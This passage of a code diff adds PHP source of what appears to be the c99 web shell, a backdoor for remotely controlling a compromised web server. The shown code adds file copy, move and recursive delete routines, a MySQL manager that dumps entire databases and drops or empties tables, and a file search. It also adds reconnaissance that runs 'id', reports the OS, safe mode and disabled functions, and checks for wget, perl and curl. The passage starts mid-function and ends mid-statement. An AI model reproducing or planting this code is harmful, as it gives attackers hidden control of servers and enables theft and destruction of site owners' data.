+          if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+          else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+          if (!$ret) {return $ret;}
+        }
+      }
+      closedir($h);
+      return TRUE;
+    }
+  }
+  if (!function_exists("fs_copy_obj")) {
+    function fs_copy_obj($d,$t) {
+      $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+      $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+      if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+      if (is_dir($d)) {
+        if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+        if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+        return fs_copy_dir($d,$t);
+      }
+      elseif (is_file($d)) { return copy($d,$t); }
+      else { return FALSE; }
+    }
+  }
+  if (!function_exists("fs_move_dir")) {
+    function fs_move_dir($d,$t) {
+      $h = opendir($d);
+      if (!is_dir($t)) {mkdir($t);}
+      while (($o = readdir($h)) !== FALSE) {
+        if (($o != ".") and ($o != "..")) {
+          $ret = TRUE;
+          if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+          else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+          if (!$ret) {return $ret;}
+        }
+      }
+      closedir($h);
+      return TRUE;
+    }
+  }
+  if (!function_exists("fs_move_obj")) {
+    function fs_move_obj($d,$t) {
+      $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+      $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+      if (is_dir($d)) {
+        if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+        if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+        return fs_move_dir($d,$t);
+      }
+      elseif (is_file($d)) {
+        if(copy($d,$t)) {return unlink($d);}
+        else {unlink($t); return FALSE;}
+      }
+      else {return FALSE;}
+    }
+  }
+  if (!function_exists("fs_rmdir")) {
+    function fs_rmdir($d) {
+      $h = opendir($d);
+      while (($o = readdir($h)) !== FALSE) {
+        if (($o != ".") and ($o != "..")) {
+          if (!is_dir($d.$o)) {unlink($d.$o);}
+          else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+        }
+      }
+      closedir($h);
+      rmdir($d);
+      return !is_dir($d);
+    }
+  }
+  if (!function_exists("fs_rmobj")) {
+    function fs_rmobj($o) {
+      $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+      if (is_dir($o)) {
+        if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+        return fs_rmdir($o);
+      }
+      elseif (is_file($o)) {return unlink($o);}
+      else {return FALSE;}
+    }
+  }
+  if (!function_exists("tabsort")) {
+    function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}
+  }
+  if (!function_exists("view_perms")) {
+    function view_perms($mode) {
+      if (($mode & 0xC000) === 0xC000) {$type = "s";}
+      elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+      elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+      elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+      elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+      elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+      elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+      else {$type = "?";}
+      $owner["read"] = ($mode & 00400)?"r":"-";
+      $owner["write"] = ($mode & 00200)?"w":"-";
+      $owner["execute"] = ($mode & 00100)?"x":"-";
+      $group["read"] = ($mode & 00040)?"r":"-";
+      $group["write"] = ($mode & 00020)?"w":"-";
+      $group["execute"] = ($mode & 00010)?"x":"-";
+      $world["read"] = ($mode & 00004)?"r":"-";
+      $world["write"] = ($mode & 00002)? "w":"-";
+      $world["execute"] = ($mode & 00001)?"x":"-";
+      if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+      if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+      if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+      return $type.join("",$owner).join("",$group).join("",$world);
+    }
+  }
+  if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+  if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+  if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+  if (!function_exists("parse_perms")) {
+    function parse_perms($mode) {
+      if (($mode & 0xC000) === 0xC000) {$t = "s";}
+      elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+      elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+      elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+      elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+      elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+      elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+      else {$t = "?";}
+      $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+      $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+      $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+      return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+    }
+  }
+  if (!function_exists("parsesort")) {
+    function parsesort($sort) {
+      $one = intval($sort);
+      $second = substr($sort,-1);
+      if ($second != "d") {$second = "a";}
+      return array($one,$second);
+    }
+  }
+  if (!function_exists("view_perms_color")) {
+    function view_perms_color($o) {
+      if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+      elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+      else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+    }
+  }
+  if (!function_exists("mysql_dump")) {
+    function mysql_dump($set) {
+      global $sh_ver;
+      $sock = $set["sock"];
+      $db = $set["db"];
+      $print = $set["print"];
+      $nl2br = $set["nl2br"];
+      $file = $set["file"];
+      $add_drop = $set["add_drop"];
+      $tabs = $set["tabs"];
+      $onlytabs = $set["onlytabs"];
+      $ret = array();
+      $ret["err"] = array();
+      if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+      if (empty($db)) {$db = "db";}
+      if (empty($print)) {$print = 0;}
+      if (empty($nl2br)) {$nl2br = 0;}
+      if (empty($add_drop)) {$add_drop = TRUE;}
+      if (empty($file)) {
+        $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+      }
+      if (!is_array($tabs)) {$tabs = array();}
+      if (empty($add_drop)) {$add_drop = TRUE;}
+      if (sizeof($tabs) == 0) {
+        //Retrieve tables-list
+        $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+        if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+      }
+      $out = "
+      # Dumped by ".$sh_name."
+      #
+      # Host settings:
+      # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+      # Date: ".date("d.m.Y H:i:s")."
+      # DB: \"".$db."\"
+      #---------------------------------------------------------";
+      $c = count($onlytabs);
+      foreach($tabs as $tab) {
+        if ((in_array($tab,$onlytabs)) or (!$c)) {
+          if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+          //Receieve query for create table structure
+          $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+          if (!$res) {$ret["err"][] = mysql_smarterror();}
+          else {
+            $row = mysql_fetch_row($res);
+            $out .= $row["1"].";\n\n";
+            //Receieve table variables
+            $res = mysql_query("SELECT * FROM `$tab`", $sock);
+            if (mysql_num_rows($res) > 0) {
+              while ($row = mysql_fetch_assoc($res)) {
+                $keys = implode("`, `", array_keys($row));
+                $values = array_values($row);
+                foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+                $values = implode("', '", $values);
+                $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+                $out .= $sql;
+              }
+            }
+          }
+        }
+      }
+      $out .= "#---------------------------------------------------------------------------------\n\n";
+      if ($file) {
+        $fp = fopen($file, "w");
+        if (!$fp) {$ret["err"][] = 2;}
+        else {
+          fwrite ($fp, $out);
+          fclose ($fp);
+        }
+      }
+      if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+      return $out;
+    }
+  }
+  if (!function_exists("mysql_buildwhere")) {
+    function mysql_buildwhere($array,$sep=" and",$functs=array()) {
+      if (!is_array($array)) {$array = array();}
+      $result = "";
+      foreach($array as $k=>$v) {
+        $value = "";
+        if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+        $value .= "'".addslashes($v)."'";
+        if (!empty($functs[$k])) {$value .= ")";}
+        $result .= "`".$k."` = ".$value.$sep;
+      }
+      $result = substr($result,0,strlen($result)-strlen($sep));
+      return $result;
+    }
+  }
+  if (!function_exists("mysql_fetch_all")) {
+    function mysql_fetch_all($query,$sock) {
+      if ($sock) {$result = mysql_query($query,$sock);}
+      else {$result = mysql_query($query);}
+      $array = array();
+      while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+      mysql_free_result($result);
+      return $array;
+    }
+  }
+  if (!function_exists("mysql_smarterror")) {
+    function mysql_smarterror($type,$sock) {
+      if ($sock) {$error = mysql_error($sock);}
+      else {$error = mysql_error();}
+      $error = htmlspecialchars($error);
+      return $error;
+    }
+  }
+  if (!function_exists("mysql_query_form")) {
+    function mysql_query_form() {
+      global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+      if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+      if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+      if ((!$submit) or ($sql_act)) {
+        echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
+        if ($tbl_struct) {
+          echo "<td valign=\"top\"><b>Fields:</b><br>";
+          foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+          echo "</td></tr></table>";
+        }
+      }
+      if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+    }
+  }
+  if (!function_exists("mysql_create_db")) {
+    function mysql_create_db($db,$sock="") {
+      $sql = "CREATE DATABASE `".addslashes($db)."`;";
+      if ($sock) {return mysql_query($sql,$sock);}
+      else {return mysql_query($sql);}
+    }
+  }
+  if (!function_exists("mysql_query_parse")) {
+    function mysql_query_parse($query) {
+      $query = trim($query);
+      $arr = explode (" ",$query);
+      $types = array(
+        "SELECT"=>array(3,1),
+        "SHOW"=>array(2,1),
+        "DELETE"=>array(1),
+        "DROP"=>array(1)
+      );
+      $result = array();
+      $op = strtoupper($arr[0]);
+      if (is_array($types[$op])) {
+        $result["propertions"] = $types[$op];
+        $result["query"]  = $query;
+        if ($types[$op] == 2) {
+          foreach($arr as $k=>$v) {
+            if (strtoupper($v) == "LIMIT") {
+              $result["limit"] = $arr[$k+1];
+              $result["limit"] = explode(",",$result["limit"]);
+              if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+              unset($arr[$k],$arr[$k+1]);
+            }
+          }
+        }
+      }
+      else {return FALSE;}
+    }
+  }
+  if (!function_exists("c99fsearch")) {
+    function c99fsearch($d) {
+      global $found;
+      global $found_d;
+      global $found_f;
+      global $search_i_f;
+      global $search_i_d;
+      global $a;
+      if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+      $h = opendir($d);
+      while (($f = readdir($h)) !== FALSE) {
+        if($f != "." && $f != "..") {
+          $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+          if (is_dir($d.$f)) {
+            $search_i_d++;
+            if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+            if (!is_link($d.$f)) {c99fsearch($d.$f);}
+          }
+          else {
+            $search_i_f++;
+            if ($bool) {
+              if (!empty($a["text"])) {
+                $r = @file_get_contents($d.$f);
+                if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+                if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+                if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+                else {$bool = strpos(" ".$r,$a["text"],1);}
+                if ($a["text_not"]) {$bool = !$bool;}
+                if ($bool) {$found[] = $d.$f; $found_f++;}
+              }
+              else {$found[] = $d.$f; $found_f++;}
+            }
+          }
+        }
+      }
+      closedir($h);
+    }
+  }
+  if ($act == "gofile") {
+    if (is_dir($f)) { $act = "ls"; $d = $f; }
+    else { $act = "f"; $d = dirname($f); $f = basename($f); }
+  }
+  //Sending Headers
+  @ob_start();
+  @ob_implicit_flush(0);
+  function onphpshutdown() {
+    global $gzipencode,$ft;
+    if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
+      $v = @ob_get_contents();
+      @ob_end_clean();
+      @ob_start("ob_gzHandler");
+      echo $v;
+      @ob_end_flush();
+    }
+  }
+  function c99shexit() {
+    onphpshutdown();
+    exit;
+  }
+  header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+  header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+  header("Cache-Control: no-store, no-cache, must-revalidate");
+  header("Cache-Control: post-check=0, pre-check=0", FALSE);
+  header("Pragma: no-cache");
+  //Setting Temporary Dir
+  if (empty($tmpdir)) {
+    $tmpdir = ini_get("upload_tmp_dir");
+    if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+  }
+  $tmpdir = realpath($tmpdir);
+  $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+  if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+  if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+  else {$tmpdir_logs = realpath($tmpdir_logs);}
+  //Getting Status
+  function showstat($stat) {
+    if ($stat=="on") { return "<font color=#00FF00><b>ON</b></font>"; }
+    else { return "<font color=#FF9900><b>OFF</b></font>"; }
+  }
+  function testperl() {
+    if (ex('perl -h')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testfetch() {
+    if(ex('fetch --help')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testwget() {
+    if (ex('wget --help')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testoracle() {
+    if (function_exists('ocilogon')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testpostgresql() {
+    if (function_exists('pg_connect')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testmssql() {
+    if (function_exists('mssql_connect')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testcurl() {
+    if (function_exists('curl_version')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testmysql() {
+    if (function_exists('mysql_connect')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function showdisablefunctions() {
+    if ($disablefunc=@ini_get("disable_functions")){ return "<font color=#FF9900><b>".$disablefunc."</b></font>"; }
+    else { return "<font color=#00FF00><b>NONE</b></b></font>"; }
+  }
+  //Getting Safe Mode Status
+  if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
+    $safemode = TRUE;
+    $hsafemode = "<font color=#3366FF><b>SAFE MODE is ON (Secure)</b></font>";
+  }
+  else {
+    $safemode = FALSE;
+    $hsafemode = "<font color=#FF9900><b>SAFE MODE is OFF (Not Secure)</b></font>";
+  }
+  $v = @ini_get("open_basedir");
+  if ($v or strtolower($v) == "on") {
+    $openbasedir = TRUE;
+    $hopenbasedir = "<font color=red>".$v."</font>";
+  }
+  else {
+    $openbasedir = FALSE;
+    $hopenbasedir = "<font color=green>OFF (not secure)</font>";
+  }
+  $sort = htmlspecialchars($sort);
+  if (empty($sort)) {$sort = $sort_default;}
+  $sort[1] = strtolower($sort[1]);
+  $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+  if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+  $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+  @ini_set("highlight.bg",$highlight_bg);
+  @ini_set("highlight.comment",$highlight_comment);
+  @ini_set("highlight.default",$highlight_default);
+  @ini_set("highlight.html",$highlight_html);
+  @ini_set("highlight.keyword",$highlight_keyword);
+  @ini_set("highlight.string",$highlight_string);
+  if (!is_array($actbox)) { $actbox = array(); }
+  $dspact = $act = htmlspecialchars($act);
+  $disp_fullpath = $ls_arr = $notls = null;
+  $ud = urlencode($d);
+  //Directory
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  if (empty($d)) {$d = realpath(".");}
+  elseif(realpath($d)) {$d = realpath($d);}
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $d = str_replace("\\\\","\\",$d);
+  $dispd = htmlspecialchars($d);
+/***** HTML START *****/
+echo $html_start;
+echo "<div class=barheader2><h3>$sh_name</h3>.: No System is Perfectly Safe :.</div>\n";
+echo "<table id=pagebar><tr><td width=50%><p>".
+     "Software : ".$DISP_SERVER_SOFTWARE ." - <a href=".$surl."act=phpini>php.ini</a><br>".
+     "$hsafemode<br>".
+     "OS : ".php_uname()."<br>";
+if (!$win) { echo "User ID : ".myshellexec("id"); }
+else { echo "User : " . get_current_user(); }
+echo "</p></td>".
+     "<td width=50%><p>Server IP : <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a> - ".
+     "Your IP : <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a><br>";
+if($win){echo "Drives : ".disp_drives($d,$surl)."<br>";}
+echo "Freespace : ".disp_freespace($d);
+echo "</p></td></tr>";
+echo "<tr><td colspan=2><p>";
+echo "MySQL: ".testmysql()." MSSQL: ".testmssql()." Oracle: ".testoracle()." MSSQL: ".testmssql()." PostgreSQL: ".testpostgresql().
+     " cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()."<br>";
+echo "Disabled Functions: ".showdisablefunctions();
+echo "</p></td></tr>";
+echo "<tr><td colspan=2 id=mainmenu>";
+if (count($quicklaunch2) > 0) {
+  foreach($quicklaunch2 as $item) {
+    $item[1] = str_replace("%d",urlencode($d),$item[1]);
+    $item[1] = str_replace("%sort",$sort,$item[1]);
+    $v = realpath($d."..");
+    if (empty($v)) {
+      $a = explode(DIRECTORY_SEPARATOR,$d);
+      unset($a[count($a)-2]);
+      $v = join(DIRECTORY_SEPARATOR,$a);
+    }
+    $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+    echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
+  }
+}
+echo "</td><tr><td colspan=2 id=mainmenu>";
+if (count($quicklaunch1) > 0) {
+  foreach($quicklaunch1 as $item) {
+    $item[1] = str_replace("%d",urlencode($d),$item[1]);
+    $item[1] = str_replace("%sort",$sort,$item[1]);
+    $v = realpath($d."..");
+    if (empty($v)) {
+      $a = explode(DIRECTORY_SEPARATOR,$d);
+      unset($a[count($a)-2]);
+      $v = join(DIRECTORY_SEPARATOR,$a);
+    }
+    $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+    echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
+  }
+}
+echo "</td></tr><tr><td colspan=2>";
+echo "<p class=fleft>";
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b) {
+  $t = ""; $j = 0;
+  foreach ($e as $r) {
+    $t.= $r.DIRECTORY_SEPARATOR;
+    if ($j == $i) { break; }
+    $j++;
+  }
+  echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=yellow>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>";
+  $i++;
+}
+echo " - ";
+if (is_writable($d)) {
+  $wd = TRUE;
+  $wdt = "<font color=#00FF00>[OK]</font>";
+  echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else {
+  $wd = FALSE;
+  $wdt = "<font color=red>[Read-Only]</font>";
+  echo "<b>".view_perms_color($d)."</b>";
+}
+?>
+</p>
+<div class=fright>
+<form method="POST"><input type=hidden name=act value="ls">
+Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
+</form>
+</div>
+</td></tr></table>
+<?php
+//Information Table
+echo "<table id=maininfo><tr><td width=\"100%\">\n";
+//Action
+if ($act == "") { $act = $dspact = "ls"; }
+if ($act == "phpini" ) { get_phpini(); }
+if ($act == "sql") {
+  $sql_surl = $surl."act=sql";
+  if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+  if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+  if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+  $sql_surl .= "&";
+  echo "<h4>Attention! SQL-Manager is <u>NOT</u> a ready module! Don't reports bugs.</h4>".
+       "<table>".
+       "<tr><td width=\"100%\" colspan=2 class=barheader>";
+  if ($sql_server) {
+    $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+    $err = mysql_smarterror();
+    @mysql_select_db($sql_db,$sql_sock);
+    if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+  }
+  else {$sql_sock = FALSE;}
+  echo ".: SQL Manager :.<br>";
+  if (!$sql_sock) {
+    if (!$sql_server) {echo "NO CONNECTION";}
+    else {echo "Can't connect! ".$err;}
+  }
+  else {
+    $sqlquicklaunch = array();
+    $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+    $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+    $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+    $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+    $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+    $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+    echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
+    if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+  }
+  echo "</td></tr><tr>";
+  if (!$sql_sock) {
+    echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width=\"90%\" height=1 valign=\"top\">";
+    echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\"></td></tr><tr><td></td></tr></form></table></td>";
+  }
+  else {
+    //Start left panel
+    if (!empty($sql_db)) {
+      ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
+      <?php
+      $result = mysql_list_tables($sql_db);
+      if (!$result) {echo mysql_smarterror();}
+      else {
+        echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+        $c = 0;
+        while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+        if (!$c) {echo "No tables found in database.";}
+      }
+    }
+    else {
+      ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade>
+      <?php
+      $result = mysql_list_dbs($sql_sock);
+      if (!$result) {echo mysql_smarterror();}
+      else {
+        ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
+        <?php
+        $c = 0;
+        $dbs = "";
+        while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+        echo "<option value=\"\">Databases (".$c.")</option>";
+        echo $dbs;
+      }
+      ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
+      <?php
+    }
+    //End left panel
+    echo "</td><td width=\"100%\">";
+    //Start center panel
+    $diplay = TRUE;
+    if ($sql_db) {
+      if (!is_numeric($c)) {$c = 0;}
+      if ($c == 0) {$c = "no";}
+      echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+      if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+      echo "</b></center>";
+      $acts = array("","dump");
+      if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
